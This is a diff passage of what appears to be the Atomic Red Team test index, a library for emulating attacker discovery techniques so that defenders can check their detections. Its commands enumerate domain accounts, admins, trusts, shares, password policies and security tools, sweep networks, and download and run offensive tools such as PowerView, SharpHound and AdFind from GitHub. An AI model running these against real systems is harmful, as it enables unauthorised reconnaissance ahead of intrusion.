to a text file. -' + ' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: @@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force -' + ' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks -' + ' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite -' + ' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites -' + ' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} -' + ' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 @@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) -' + ' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} -' + ' executor: command: 'Invoke-Expression #{adrecon_path} -' + ' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt @@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account -' + ' supported_platforms: - windows executor: command: 'net user administrator /domain -' + ' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed -' + ' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} -' + ' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name -' + ' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 @@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. -' + ' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. -' + ' - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} -' + ' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | @@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * -' + ' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk -' + ' prereq_command: 'WHERE nltest.exe >NUL 2>&1 -' + ' get_prereq_command: 'echo Sorry RSAT must be installed manually -' + ' executor: command: 'nltest /domain_trusts -' + ' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk -' + ' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" -' + ' - description: 'RSAT PowerShell AD admin cmdlets must be installed -' + ' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" -' + ' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" @@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system -' + ' supported_platforms: - macos - linux @@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file -' + ' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 -' + ' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user -' + ' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username -' + ' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely -' + ' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get install login; exit 1; -' + ' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups -' + ' supported_platforms: - linux - macos @@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups -' + ' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. -' + ' supported_platforms: - windows executor: command: 'query user -' + ' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery -' + ' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) -' + ' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" -' + ' executor: name: powershell elevation_required: false @@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore -' + ' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'wmic.exe group get name -' + ' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group -' + ' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must be installed -' + ' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python -' + ' supported_platforms: - windows input_arguments: @@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' executor: command: 'python #{filename} -i #{host_ip} -' + ' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery -' + ' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus -' + ' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares -' + ' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} -' + ' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare -' + ' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae @@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share -' + ' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain -' + ' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: '"Join system to domain" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 -' + ' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. -' + ' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v7 -' + ' executor: command: 'cat /etc/security/pwquality.conf -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v6 -' + ' executor: command: | cat /etc/pam.d/system-auth @@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. -' + ' supported_platforms: - linux executor: command: 'cat /etc/login.defs -' + ' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts -' + ' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts /domain -' + ' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. -' + ' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 'tasklist -' + ' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain -' + ' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} -' + ' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 @@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i -' + ' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a -' + ' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' -' + ' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done -' + ' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f @@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'adidnsdump must be installed and part of PATH -' + ' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} -' + ' get_prereq_command: 'pip3 install adidnsdump -' + ' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} -' + ' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects @@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt @@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip neighbour show -' + ' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 @@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip route show -' + ' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388 @@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." -' + ' name: sh T1518.001: technique: @@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' -' + ' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' -' + ' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 -' + ' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI @@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion -' + ' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b @@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors -' + ' supported_platforms: - macos executor: @@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. -' + ' supported_platforms: - windows executor: @@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info -' + ' supported_platforms: - macos executor: @@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info -' + ' supported_platforms: - linux - macos @@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null -' + ' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. -' + ' supported_platforms: - windows executor: command: 'hostname -' + ' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. -' + ' supported_platforms: - linux - macos executor: command: 'hostname -' + ' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value 